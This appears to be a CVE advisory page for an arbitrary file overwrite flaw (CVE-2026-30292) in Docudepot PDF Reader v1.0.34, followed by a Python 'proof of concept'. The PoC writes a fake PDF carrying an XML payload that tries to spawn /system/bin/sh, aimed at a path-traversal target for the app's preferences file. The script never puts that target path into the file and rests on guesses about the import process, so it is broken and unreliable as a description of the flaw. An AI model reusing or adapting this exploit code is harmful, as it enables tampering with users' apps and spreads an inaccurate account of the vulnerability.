Security Vulnerability Report
CVE-2026-30292 CVSS 8.4 HIGH

Published: 2026-04-01 15:22:59
Last Modified: 2026-04-27 19:18:47

Description

An arbitrary file overwrite vulnerability in Docudepot PDF Reader: PDF Viewer APP v1.0.34 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Docudepot PDF Reader 1.0.34

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os

# Proof of Concept (PoC) for CVE-2026-30292
# This script demonstrates the logic of exploiting the arbitrary file overwrite vulnerability.
# Scenario: Attacker creates a malicious file intended to overwrite a critical config file.
# In a real exploitation, the attacker would trick the victim into importing this file
# or place it in a location where Docudepot PDF Reader automatically processes it.

def craft_exploit_file(target_file_path, payload_content):
    """
    Simulates the creation of a file that, when imported by the vulnerable app,
    triggers the overwrite of a sensitive file.
    """
    malicious_filename = "exploit_payload.pdf"

    # In this specific vulnerability, the import process likely uses the filename
    # or internal metadata to determine the write destination without proper sanitization.
    # We simulate the payload structure.
    print(f"[*] Crafting exploit file: {malicious_filename}")
    print(f"[*] Target internal path to overwrite: {target_file_path}")

    # Writing the simulated payload to a local file (representing the attacker's action)
    with open(malicious_filename, "wb") as f:
        # Header or specific file signature required by the PDF Reader
        f.write(b"%PDF-1.4\n")
        # Embedding the path traversal logic if the parser allows it, or simply
        # representing the data that will be written.
        # Assuming the app copies the file content directly to the vulnerable path.
        f.write(payload_content.encode("utf-8"))

    print("[+] Exploit file created successfully.")
    print(f"[!] Next Step: Import '{malicious_filename}' into Docudepot PDF Reader v1.0.34.")
    print(f"[!] Result: The application will overwrite '{target_file_path}' with the payload content.")

# Example usage
# Overwriting a shared preferences file or a native library could lead to RCE.
target_path = "../../data/data/pdf.pdfreader.pdfeditor/shared_prefs/settings.xml"
# Inner double quotes are escaped so the literal parses; the original line was a syntax error.
malicious_data = "<preferences><evil_code>exec('runtime.exec(\"/system/bin/sh\")')</evil_code></preferences>"
craft_exploit_file(target_path, malicious_data)

References

https://docudepot.bitbucket.io/
https://github.com/Secsys-FDU/AF_CVEs/issues/20
https://play.google.com/store/apps/details?id=pdf.pdfreader.pdfeditor.pdfmaker.pdfscanner
https://secsys.fudan.edu.cn/

Weakness: CWE-73
Record Status: Deferred